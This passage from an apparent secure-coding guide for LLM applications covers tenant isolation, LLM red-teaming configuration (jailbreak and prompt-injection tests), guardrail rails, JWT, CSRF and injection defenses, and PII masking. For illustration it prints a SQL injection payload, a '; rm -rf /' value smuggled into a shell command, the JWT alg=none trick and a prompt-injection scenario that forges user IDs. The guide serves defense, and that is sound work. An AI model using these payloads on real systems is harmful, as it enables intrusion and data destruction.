        r"api[_-]?key": "[API_KEY_REDACTED]",
        r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
    }
    HASH_FIELDS = {"prompt", "response", "content"}

    def audit(self, event: str, **kwargs):
        sanitized = self._sanitize(kwargs)
        self._logger.info(event, audit=True, **sanitized)

Anti-Patterns

# BAD: Mutable context
class RequestContext:
    user_id: UUID  # Can be changed!

# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."

# BAD: Global query without tenant filter
async def find_all():
    return await db.execute("SELECT * FROM documents")

# BAD: Tenant filter as optional
async def find(tenant_id: UUID | None = None):
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
    return await db.find(tenant_id=ctx.tenant_id)

Testing Tenant Isolation

async def test_tenant_a_cannot_see_tenant_b_documents(tenant_a_ctx, tenant_b_ctx, db_session):
    doc = Document(tenant_id=tenant_b_ctx.tenant_id, content="Secret data")
    db_session.add(doc)  # session.add() is synchronous
    await db_session.commit()

    repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
    result = await repo.find_by_id(doc.id)

    assert result is None  # Tenant A cannot see tenant B's data

Incorrect — Optional tenant filtering allows cross-tenant data access:

async def find_documents(tenant_id: UUID | None = None):
    query = select(Document)
    if tenant_id:  # Can be bypassed by omitting parameter
        query = query.where(Document.tenant_id == tenant_id)
    return await session.execute(query)

Correct — Immutable RequestContext makes tenant filtering mandatory and tamper-proof:

async def find_documents(ctx: RequestContext):
    # Tenant filter is mandatory via immutable context
    query = select(Document).where(
        Document.tenant_id == ctx.tenant_id  # Cannot be bypassed
    )
    return await session.execute(query)

LLM Red-Teaming and OWASP LLM Compliance — CRITICAL

LLM Red-Teaming and OWASP LLM Compliance

Incorrect — shipping an LLM system without adversarial testing:

# Only testing happy path, no adversarial inputs
def test_chatbot():
    response = chatbot.respond("What's the weather?")
    assert response  # No jailbreak, injection, or bias testing!

Correct — DeepTeam red-teaming audit:

from typing import Callable

from deepteam import red_team
from deepteam.vulnerabilities import (
    Bias, Toxicity, PIILeakage,
    PromptInjection, Jailbreaking,
    Misinformation, CompetitorEndorsement
)

async def run_red_team_audit(target_model: Callable, attacks_per_vulnerability: int = 10) -> dict:
    results = await red_team(
        model=target_model,
        vulnerabilities=[
            Bias(categories=["gender", "race", "religion", "age"]),
            Toxicity(threshold=0.7),
            PIILeakage(types=["email", "phone", "ssn", "credit_card"]),
            PromptInjection(techniques=["direct", "indirect", "context"]),
            Jailbreaking(multi_turn=True, techniques=["dan", "roleplay", "context_manipulation"]),
            Misinformation(domains=["health", "finance", "legal"]),
        ],
        attacks_per_vulnerability=attacks_per_vulnerability,
    )

    return {
        "total_attacks": results.total_attacks,
        "successful_attacks": results.successful_attacks,
        "attack_success_rate": results.successful_attacks / results.total_attacks,
        "vulnerabilities": [
            {"type": v.type, "severity": v.severity, "mitigation": v.suggested_mitigation}
            for v in results.vulnerabilities
        ],
    }

OWASP Top 10 for LLMs mapping:

| OWASP LLM Risk | Guardrail Solution |
| --- | --- |
| LLM01: Prompt Injection | NeMo input rails, Guardrails AI validators |
| LLM02: Insecure Output | Output rails, structured validation |
| LLM04: Model Denial of Service | Rate limiting, token budgets, timeout rails |
| LLM06: Sensitive Info Disclosure | PII detection, context separation |
| LLM07: Insecure Plugin Design | Tool validation, permission boundaries |
| LLM08: Excessive Agency | Human-in-loop rails, action confirmation |
| LLM09: Overreliance | Factuality checking, confidence thresholds |

Framework comparison:

| Framework | Best For | Key Features |
| --- | --- | --- |
| NeMo Guardrails | Programmable flows, Colang 2.0 | Input/output rails, fact-checking |
| Guardrails AI | Validator-based, modular | 100+ validators, PII, toxicity |
| OpenAI Guardrails | Drop-in wrapper | Simple integration |
| DeepTeam | Red teaming, adversarial | 40+ vulnerabilities, GOAT attacks |

Key decisions:

  • Red-teaming frequency: Pre-release + quarterly
  • Fact-checking: Required for factual domains (health, finance, legal)
  • DeepTeam for 40+ vulnerability types with OWASP alignment
  • Always test multi-turn jailbreaking (GOAT-style attacks)

Deploy NeMo Guardrails and Guardrails AI to defend against prompt injection and toxicity — CRITICAL

NeMo Guardrails and Guardrails AI

Incorrect — returning raw LLM output without validation:

# No input sanitization, no output validation
user_input = request.json["message"]
response = llm.generate(user_input)  # Prompt injection risk!
return response  # Raw, unvalidated output!

Correct — NeMo Guardrails with Guardrails AI integration:

# config.yml
models:
  - type: main
    engine: openai
    model: gpt-5.2

rails:
  config:
    guardrails_ai:
      validators:
        - name: toxic_language
          parameters:
            threshold: 0.5
            validation_method: "sentence"
        - name: guardrails_pii
          parameters:
            entities: ["phone_number", "email", "ssn", "credit_card"]
        - name: restricttotopic
          parameters:
            valid_topics: ["technology", "support"]

  input:
    flows:
      - guardrailsai check input $validator="guardrails_pii"
  output:
    flows:
      - guardrailsai check output $validator="toxic_language"
      - guardrailsai check output $validator="restricttotopic"

Correct — Colang 2.0 fact-checking rails:

define flow answer question with facts
  """Enable fact-checking for RAG responses."""
  user ...
  $answer = execute rag()
  $check_facts = True
  bot $answer

define flow check hallucination
  """Block responses about people without verification."""
  user ask about people
  $check_hallucination = True
  bot respond about people

Correct — Guardrails AI validators in Python:

from guardrails import Guard
from guardrails.hub import ToxicLanguage, DetectPII, RestrictToTopic, ValidLength

guard = Guard().use_many(
    ToxicLanguage(threshold=0.5, on_fail="filter"),
    DetectPII(pii_entities=["EMAIL_ADDRESS", "PHONE_NUMBER", "SSN"], on_fail="fix"),
    RestrictToTopic(valid_topics=["technology", "support"], on_fail="refrain"),
    ValidLength(min=10, max=500, on_fail="reask"),
)

# Always validate BOTH input and output (the same guard can screen user input)
input_result = guard.validate(user_input)
if not input_result.validation_passed:
    return "Invalid input"

llm_output = llm.generate(input_result.validated_output)
output_result = guard(llm_api=openai.chat.completions.create, model="gpt-5.2",
                      messages=[{"role": "user", "content": user_input}])

if output_result.validation_passed:
    return output_result.validated_output

Key decisions:

  • NeMo for programmable flows (Colang 2.0), Guardrails AI for validators
  • Toxicity threshold: 0.5 for content apps, 0.3 for children's apps
  • PII handling: Redact for logs, block for outputs
  • Topic restriction: Allowlist preferred over blocklist
  • Always validate both input AND output
  • Never use single validation layer

LLM: Content Filtering & Three-Phase Pattern — HIGH

Content Filtering & Three-Phase Pattern

The Three-Phase Pattern

Phase 1: PRE-LLM     | Filter data, extract content, save refs
Phase 2: LLM CALL    | Content-only prompt, no identifiers
Phase 3: POST-LLM    | Validate output, attach attribution

Phase 1: Pre-LLM (Filter & Extract)

async def prepare_for_llm(query: str, ctx: RequestContext):
    # 1. Retrieve with tenant filter
    documents = await semantic_search(
        query_embedding=embed(query),
        ctx=ctx,  # Filters by tenant_id, user_id
    )

    # 2. Save references for attribution
    source_refs = SourceRefs(
        document_ids=[d.id for d in documents],
        chunk_ids=[c.id for d in documents for c in d.chunks],  # assumes docs carry their chunks
    )

    # 3. Extract content only (no IDs)
    content_texts = [strip_identifiers(d.content) for d in documents]

    return query, content_texts, source_refs

def strip_identifiers(text: str) -> str:
    """Remove any IDs from content."""
    text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
    for pattern in [r'user_id:\s*\S+', r'tenant_id:\s*\S+']:
        text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
    return text

Phase 2: LLM Call (Content Only)

def build_prompt(content: str, context_texts: list[str]) -> str:
    prompt = f"""
    Analyze the following content and provide insights.

    CONTENT:
    {content}

    RELEVANT CONTEXT:
    {chr(10).join(f"- {text}" for text in context_texts)}
    """

    # AUDIT: Verify no IDs leaked
    violations = audit_prompt(prompt)
    if violations:
        raise SecurityError(f"IDs leaked to prompt: {violations}")

    return prompt

async def call_llm(prompt: str) -> dict:
    """LLM only sees content, never IDs."""
    response = await llm.generate(prompt)
    return parse_response(response)

Phase 3: Post-LLM (Attribute)

async def save_with_attribution(
    llm_output: dict, ctx: RequestContext, source_refs: SourceRefs,
) -> Analysis:
    """Attribution is DETERMINISTIC, not LLM-generated."""

    # Validate no IDs in output
    if re.search(UUID_PATTERN, str(llm_output)):
        raise SecurityError("LLM output contains hallucinated IDs")

    return await Analysis.create(
        id=uuid4(),                                    # We generate
        user_id=ctx.user_id,                           # From context
        tenant_id=ctx.tenant_id,                       # From context
        trace_id=ctx.trace_id,                         # From context
        source_document_ids=source_refs.document_ids,  # From pre-LLM
        content=llm_output["analysis"],                # From LLM
        key_concepts=llm_output["key_concepts"],       # From LLM
        created_at=datetime.now(timezone.utc),
    )

Complete Workflow

async def safe_analyze(query: str, ctx: RequestContext):
    # Phase 1: Pre-LLM
    query, content_texts, source_refs = await prepare_for_llm(query, ctx)

    # Phase 2: LLM Call
    prompt = build_prompt(query, content_texts)
    llm_output = await call_llm(prompt)

    # Phase 3: Post-LLM
    result = await save_with_attribution(
        llm_output=llm_output, ctx=ctx, source_refs=source_refs,
    )
    return result

Output Validation

After LLM returns, validate:

async def validate_output(llm_output: dict, context_texts: list[str]):
    # 1. Schema validation
    parsed = AnalysisOutput.model_validate(llm_output)

    # 2. Guardrails
    if await contains_toxic_content(parsed.content):
        return ValidationResult(valid=False, reason="Toxic content")

    # 3. Grounding check
    if not is_grounded(parsed.content, context_texts):
        return ValidationResult(valid=False, reason="Ungrounded claims")

    # 4. No hallucinated IDs
    if contains_uuid_pattern(parsed.content):
        return ValidationResult(valid=False, reason="Hallucinated IDs")

    return ValidationResult(valid=True)

Common Mistakes

# BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
doc_id = response["source_document"]  # HALLUCINATED!

# BAD: Trusting LLM-provided IDs
artifact.user_id = llm_output["user_id"]  # WRONG!

# GOOD: Attribution from our records
artifact.user_id = ctx.user_id         # From JWT
artifact.sources = source_refs.doc_ids  # From pre-LLM
artifact.id = uuid4()                   # We generate

Checklist Before Any LLM Call

  • RequestContext available
  • Data filtered by tenant_id and user_id
  • Content extracted without IDs
  • Source references saved
  • Prompt passes audit
  • Output validated before use
  • Attribution uses context, not LLM output

Incorrect — Asking LLM for attribution leads to hallucinated document IDs:

prompt = f"Analyze this content and cite which documents support each claim."
response = await llm.generate(prompt)
# Save with LLM-generated document IDs
artifact.source_ids = response["document_ids"]  # HALLUCINATED!

Correct — Save source references before LLM call, attach deterministically after:

# Phase 1: Save refs before LLM
docs = await semantic_search(query, ctx)
source_refs = [d.id for d in docs]
# Phase 2: LLM sees only content
response = await llm.generate(content_only_prompt)
# Phase 3: Attach saved refs
artifact.source_ids = source_refs  # From our records, not LLM

Apply output guardrails with schema validation, grounding checks, and content safety filtering — HIGH

Output Guardrails

Purpose

After LLM returns, validate output before using it:

  1. Schema: Response matches expected structure
  2. No IDs: No hallucinated UUIDs
  3. Grounded: Claims supported by provided context
  4. Safe: No toxic/harmful content
  5. Size: Within limits

Schema Validation

from pydantic import BaseModel, ValidationError

def validate_schema(llm_output: dict, schema: type[BaseModel]):
    try:
        parsed = schema.model_validate(llm_output)
        return parsed, ValidationResult(status="passed")
    except ValidationError as e:
        return None, ValidationResult(
            status="failed",
            reason=f"Schema error: {e.error_count()} errors",
        )

class AnalysisOutput(BaseModel):
    summary: str
    key_concepts: list[str]
    difficulty: str

No Hallucinated IDs

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def validate_no_ids(output: str) -> ValidationResult:
    uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
    if uuids:
        return ValidationResult(
            status="failed",
            reason=f"Found {len(uuids)} hallucinated UUIDs",
        )
    return ValidationResult(status="passed")

Grounding Validation

def validate_grounding(output: str, context_texts: list[str], threshold: float = 0.3):
    output_terms = set(extract_key_terms(output))
    context_terms = set()
    for text in context_texts:
        context_terms.update(extract_key_terms(text))

    if not output_terms:
        return ValidationResult(status="warning", reason="No key terms")

    overlap = len(output_terms & context_terms) / len(output_terms)
    if overlap < threshold:
        return ValidationResult(
            status="warning",
            reason=f"Low grounding: {overlap:.2%}",
        )
    return ValidationResult(status="passed")

Content Safety

async def validate_content_safety(output: str):
    # PII detection
    pii_patterns = {
        "email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
        "phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
        "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
    }

    detected_pii = []
    for pii_type, pattern in pii_patterns.items():
        if re.search(pattern, output):
            detected_pii.append(pii_type)

    if detected_pii:
        return ValidationResult(
            status="warning",
            reason=f"PII detected: {detected_pii}",
        )
    return ValidationResult(status="passed")

Combined Validator

async def run_guardrails(
    llm_output: dict,
    context_texts: list[str],
    schema: type[BaseModel],
) -> tuple[BaseModel | None, list[ValidationResult]]:
    results = []

    # 1. Schema
    parsed, result = validate_schema(llm_output, schema)
    results.append(result)
    if result.status == "failed":
        return None, results

    output_str = str(llm_output)

    # 2. No hallucinated IDs
    results.append(validate_no_ids(output_str))

    # 3. Grounding check
    results.append(validate_grounding(output_str, context_texts))

    # 4. Content safety
    results.append(await validate_content_safety(output_str))

    # 5. Size limits
    results.append(validate_size(output_str))

    failures = [r for r in results if r.status == "failed"]
    if failures:
        return None, results

    return parsed, results

Anti-Patterns

# BAD: No validation
artifact.content = llm_response["content"]

# BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response)

# BAD: Trusting LLM self-assessment
if llm_response.get("is_safe", True):
    use_response(llm_response)

# GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
    llm_output=response, context_texts=context, schema=AnalysisOutput,
)

Incorrect — Trusting LLM output without validation allows toxic content and hallucinated IDs:

response = await llm.generate(prompt)
analysis = Analysis(
    content=response["summary"],  # Could be toxic
    document_id=response["doc_id"],  # Hallucinated UUID!
)
await db.save(analysis)

Correct — Multi-layer guardrails validate schema, detect hallucinated IDs, and check grounding:

response = await llm.generate(prompt)
parsed, results = await run_guardrails(
    llm_output=response, context_texts=context, schema=AnalysisOutput,
)
if not parsed:
    raise ValidationError(f"Guardrails failed: {results}")
# Now safe to use parsed output

Defend against prompt injection by routing identifiers around the LLM, not through prompts — HIGH

Prompt Injection Defense

The Core Principle

Identifiers flow AROUND the LLM, not THROUGH it. The LLM sees only content. Attribution happens deterministically.

Why IDs in Prompts Are Dangerous

  1. Hallucination: LLM invents IDs that don't exist
  2. Confusion: LLM mixes up which ID belongs where
  3. Injection: Attacker manipulates IDs via prompt injection
  4. Leakage: IDs appear in logs, caches, traces
  5. Cross-tenant: LLM could reference other users' data

Forbidden Parameters in Prompts

| Parameter | Type | Why Forbidden |
| --- | --- | --- |
| user_id | UUID | Hallucination risk, cross-user access |
| tenant_id | UUID | Critical for multi-tenant isolation |
| analysis_id | UUID | Job tracking, not for LLM |
| document_id | UUID | Source tracking, not for LLM |
| session_id | str | Auth context, not for LLM |
| api_key | str | Secret exposure |
| Any UUID | UUID | Pattern: `[0-9a-f]{8}-...` |

Detection Pattern

import re

FORBIDDEN_PATTERNS = [
    r'user[_-]?id', r'tenant[_-]?id',
    r'analysis[_-]?id', r'document[_-]?id',
    r'session[_-]?id', r'trace[_-]?id',
    r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
]

def audit_prompt(prompt: str) -> list[str]:
    violations = []
    for pattern in FORBIDDEN_PATTERNS:
        if re.search(pattern, prompt, re.IGNORECASE):
            violations.append(pattern)
    return violations

Safe Prompt Builder

from typing import Any

class SafePromptBuilder:
    def __init__(self, strict: bool = True):
        self._parts: list[str] = []
        self._context: dict[str, Any] = {}
        self._strict = strict

    def add_system(self, instruction: str) -> "SafePromptBuilder":
        audit = audit_text(instruction)
        if not audit.is_clean:
            raise PromptSecurityError("Forbidden content", audit.critical_violations)
        self._parts.append(f"SYSTEM:\n{instruction}")
        return self

    def add_user_query(self, query: str) -> "SafePromptBuilder":
        clean = self._sanitize(query)
        self._parts.append(f"USER QUERY:\n{clean}")
        return self

    def add_context_documents(self, documents: list[str]) -> "SafePromptBuilder":
        clean_docs = [self._sanitize(doc) for doc in documents]
        formatted = "\n".join(f"- {doc}" for doc in clean_docs)
        self._parts.append(f"CONTEXT:\n{formatted}")
        return self

    def store_context(self, key: str, value: Any) -> "SafePromptBuilder":
        """Store for attribution - NEVER included in prompt."""
        self._context[key] = value
        return self

    def _sanitize(self, text: str) -> str:
        text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
        return text

    def build(self) -> tuple[str, dict[str, Any]]:
        prompt = "\n\n".join(self._parts)
        audit = audit_text(prompt)
        if not audit.is_clean:
            raise PromptSecurityError(f"Final prompt forbidden: {audit.critical_violations}")
        return prompt, self._context.copy()

Usage

prompt, context = (
    SafePromptBuilder()
    .add_system("You are an expert content analyzer.")
    .add_user_query("What are the key concepts in machine learning?")
    .add_context_documents(["Machine learning is a subset of AI..."])
    .store_context("user_id", ctx.user_id)      # Stored, NOT in prompt
    .store_context("source_ids", doc_ids)        # Stored, NOT in prompt
    .build()
)

Common Mistakes

# BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"

# BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."

# GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"

Pre-LLM Checklist

  • RequestContext obtained from JWT
  • Data filtered by tenant_id and user_id
  • Content extracted without IDs
  • Source references saved for attribution
  • audit_prompt() called on final prompt
  • No violations detected

Incorrect — Including user_id in prompt allows injection and hallucination attacks:

prompt = f"""
Analyze the document for user {ctx.user_id}.
Tenant: {ctx.tenant_id}
Content: {user_content}
"""
# Attacker can inject: "user_id: <fake-uuid>" in content

Correct — Content-only prompts prevent ID leakage and injection vectors:

# Store context separately, never in prompt
context_data = {"user_id": ctx.user_id, "tenant_id": ctx.tenant_id}
prompt = f"Analyze the following content:\n{sanitized_content}"
# audit_prompt(prompt) passes — no IDs detected

Prevent JWT algorithm confusion, token sidejacking, CSRF, and session timing attacks — CRITICAL

Authentication & Session Attacks

JWT Algorithm Confusion

# VULNERABLE: Algorithm read from token header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret

# SAFE: Hardcode expected algorithm
def verify_jwt(token: str) -> dict:
    # Pass issuer/audience so PyJWT verifies the claims itself; PyJWT
    # rejects a token carrying aud unless an expected audience is supplied.
    return jwt.decode(
        token, SECRET_KEY,
        algorithms=['HS256'],  # NEVER read from header
        issuer=EXPECTED_ISSUER,
        audience=EXPECTED_AUDIENCE,
        options={'require': ['exp', 'iat', 'iss', 'aud']},
    )

Token Sidejacking Protection (OWASP)

def create_protected_token(user_id: str, response) -> str:
    """Token with fingerprint to prevent sidejacking."""
    fingerprint = secrets.token_urlsafe(32)

    payload = {
        'user_id': user_id,
        'fingerprint': hashlib.sha256(fingerprint.encode()).hexdigest(),
        'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
        'iat': datetime.now(timezone.utc),
        'iss': ISSUER,
        'aud': AUDIENCE,
    }

    # Send raw fingerprint as hardened cookie
    response.set_cookie(
        '__Secure-Fgp', fingerprint,
        httponly=True, secure=True,
        samesite='Strict', max_age=900,
    )

    return jwt.encode(payload, SECRET_KEY, algorithm='HS256')

CSRF Protection

# VULNERABLE: No CSRF protection
@app.post("/transfer")
async def transfer_money(to_account: str = Form(...), amount: float = Form(...)):
    perform_transfer(to_account, amount)

# SAFE: CSRF token validation
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
    if request.session.get("csrf_token") != csrf_token:
        raise HTTPException(status_code=403, detail="CSRF token mismatch")

@app.post("/transfer")
async def transfer_money(
    to_account: str = Form(...), amount: float = Form(...),
    _: None = Depends(verify_csrf_token),
):
    perform_transfer(to_account, amount)

# Alternative: SameSite cookies
response.set_cookie(
    key="session_id", value=session_token,
    httponly=True, secure=True,
    samesite="strict",  # Key CSRF protection
)

Timing Attack Prevention

# VULNERABLE: Character-by-character comparison
def check_password(stored_hash: str, provided_hash: str) -> bool:
    for a, b in zip(stored_hash, provided_hash):
        if a != b:
            return False  # Early exit reveals info
    return True

# SAFE: Constant-time comparison
import hmac
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
    provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
    return hmac.compare_digest(stored_hash, provided_hash)

# Better: Use a proper library
from argon2 import PasswordHasher
ph = PasswordHasher()
ph.verify(stored_hash, password)  # Handles timing safely

Security Misconfiguration

# VULNERABLE: Debug mode in production
app.debug = True

# SAFE: Environment-based config
app.debug = os.getenv('FLASK_ENV') == 'development'

# VULNERABLE: CORS allow all
CORS(app, origins="*", supports_credentials=True)

# SAFE: Explicit origins
CORS(app, origins=["https://app.example.com"], supports_credentials=True)

Vulnerable Components

# Scan for vulnerabilities
npm audit
pip-audit

# Fix vulnerabilities
npm audit fix

JWT Security Checklist

  • Hardcode algorithm (never read from header)
  • Validate: exp, iat, iss, aud claims
  • Short expiry (15 min - 1 hour)
  • Use refresh token rotation for longer sessions
  • Implement token denylist for logout/revocation
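
For the denylist item above, a common approach keys revocations by the token's jti claim and lets entries expire with the token. A hypothetical sketch assuming a redis-py client r and a jti claim in the payload:

import time

# Hypothetical: revoke by jti; keep the entry only as long as the token lives
def revoke_token(r, payload: dict) -> None:
    ttl = payload["exp"] - int(time.time())
    if ttl > 0:
        r.setex(f"denylist:{payload['jti']}", ttl, "1")

def is_revoked(r, payload: dict) -> bool:
    return r.exists(f"denylist:{payload['jti']}") == 1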

Detection

# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .

# Missing SameSite cookies
grep -rn "set_cookie\|setCookie" --include="*.py" . | grep -v "samesite"

# CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .

# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .

Incorrect — reading JWT algorithm from untrusted token header:

header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])

Correct — hardcoding expected algorithm with claim validation:

payload = jwt.decode(
    token, SECRET_KEY,
    algorithms=['HS256'],
    options={'require': ['exp', 'iat', 'iss', 'aud']},
)

Summary

| Vulnerability | Bandit ID | Fix |
|---|---|---|
| SQL Injection | B608 | Parameterized queries |
| JWT Algorithm | B105 | Hardcode algorithm |
| Timing Attack | B303 | hmac.compare_digest |
| XSS | N/A | textContent, escape() |
| CSRF | N/A | SameSite cookies, tokens |

Prevent SQL, command, and SSRF injection with parameterized queries and input validation — CRITICAL

Injection Prevention

SQL Injection

Vulnerable — user input directly interpolated into query:

# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE email = '{email}'"

Safe — parameterized query and ORM:

# SAFE: Parameterized query
query = "SELECT * FROM users WHERE email = ?"
db.execute(query, [email])

# SAFE: ORM
db.query(User).filter(User.name == name).first()

SQL Injection Attack Demo

Vulnerable — f-string interpolation allows injection payload:

# Vulnerable endpoint
@app.get("/users/search")
def search_users(username: str = Query(...)):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchall()

# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns ALL users

Safe — parameterized query prevents injection:

@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
    cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
    return cursor.fetchall()

Command Injection

# VULNERABLE: User input in shell command
import os
os.system(f"convert {filename} output.png")  # filename = "; rm -rf /"

# SAFE: subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

SSRF (Server-Side Request Forgery)

# VULNERABLE: Fetch any URL
response = requests.get(user_provided_url)

# SAFE: Allowlist domains (and require HTTPS)
from urllib.parse import urlparse

ALLOWED = ['api.example.com']
parsed = urlparse(url)
if parsed.scheme != 'https' or parsed.hostname not in ALLOWED:
    abort(400)
response = requests.get(url)

Broken Access Control (IDOR)

# VULNERABLE: No authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
    return db.query(Document).get(doc_id)  # Anyone can access any doc

# SAFE: Authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
    doc = db.query(Document).get(doc_id)
    if doc.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return doc

Cryptographic Failures

# VULNERABLE: Weak hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()

# SAFE: Modern password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)

Insecure Deserialization

# VULNERABLE: Pickle from untrusted source
import pickle
data = pickle.loads(user_input)  # Can execute arbitrary code

# SAFE: Use JSON
import json
data = json.loads(user_input)  # Only parses data

Detection Commands

# Detect SQL injection patterns
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .
bandit -r . -t B608

# Detect command injection
semgrep --config "p/python-security-audit" .

# Detect SSRF
grep -rn "requests.get\|urllib.urlopen" --include="*.py" .

Incorrect — interpolating user input directly into SQL query:

query = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(query)

Correct — using parameterized query to prevent injection:

cursor.execute("SELECT * FROM users WHERE email = ?", (email,))

Quick Reference

| Vulnerability | Fix |
|---|---|
| SQL Injection | Parameterized queries, ORM |
| Command Injection | subprocess with list args |
| SSRF | URL domain allowlist |
| IDOR | Authorization check on every endpoint |
| Weak crypto | Argon2/bcrypt, not MD5/SHA1 |
| Insecure deserialization | JSON, not pickle |

Detect PII exposure through regex and ML-based patterns using Presidio and LLM Guard — HIGH

PII Detection Patterns

Regex-Based Detection

import re

def mask_pii(data, **kwargs):
    """Mask PII using regex patterns."""
    if isinstance(data, str):
        # Credit cards
        data = re.sub(r'\b(?:\d[ -]*?){13,19}\b', '[REDACTED_CC]', data)
        # Emails
        data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
        # Phone numbers
        data = re.sub(r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b', '[REDACTED_PHONE]', data)
        # SSN
        data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
    return data

Microsoft Presidio Pipeline

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def detect_pii(text: str, language: str = "en") -> list:
    return analyzer.analyze(
        text=text, language=language,
        entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
    )

def anonymize_text(text: str, language: str = "en") -> str:
    results = analyzer.analyze(text=text, language=language)
    return anonymizer.anonymize(text=text, analyzer_results=results).text

Presidio Custom Operators

from presidio_anonymizer.entities import OperatorConfig

operators = {
    "PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
    "CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
    "EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
    "US_SSN": OperatorConfig("redact"),
}

anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)

Custom Recognizers

from presidio_analyzer import Pattern, PatternRecognizer

internal_id_recognizer = PatternRecognizer(
    supported_entity="INTERNAL_ID",
    patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)

LLM Guard Anonymization

from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault

vault = Vault()
scanner = Anonymize(
    vault=vault, language="en",
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    use_faker=True,  # Replace with fake data
)

def sanitize_input(prompt: str) -> tuple[str, bool, float]:
    sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
    return sanitized_prompt, is_valid, risk_score

# "My name is Jane Smith" -> "My name is [REDACTED_PERSON_1]"

LLM Guard Output Scanning

from llm_guard.output_scanners import Sensitive

sensitive_scanner = Sensitive(
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    redact=True,
    threshold=0.5,
)

def check_output_for_pii(prompt: str, output: str):
    sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
    return sanitized_output, is_valid, risk_score

Anti-Patterns

# NEVER log raw PII
logger.info(f"User email: {user.email}")

# NEVER send unmasked data to observability
langfuse.trace(input=raw_prompt)

# ALWAYS mask before logging
logger.info(f"User email: {mask_pii(user.email)}")

# ALWAYS use mask callback
langfuse = Langfuse(mask=mask_pii)

Key Decisions

| Decision | Recommendation |
|---|---|
| Detection engine | Presidio (enterprise), regex (simple), LLM Guard (LLM pipelines) |
| Masking strategy | Replace with type tokens like [REDACTED_EMAIL] |
| Performance | Async/batch for high-throughput (see the sketch below) |
| Reversibility | LLM Guard Vault for deanonymization |
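
For the Performance row, one option is to push Presidio's synchronous analysis off the event loop and process records concurrently. A minimal sketch using asyncio.to_thread (Python 3.9+); engine setup matches the pipeline above:

import asyncio

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def _mask_one(text: str) -> str:
    results = analyzer.analyze(text=text, language="en")
    return anonymizer.anonymize(text=text, analyzer_results=results).text

async def mask_batch(texts: list[str]) -> list[str]:
    # Run CPU-bound Presidio calls in worker threads, one task per record
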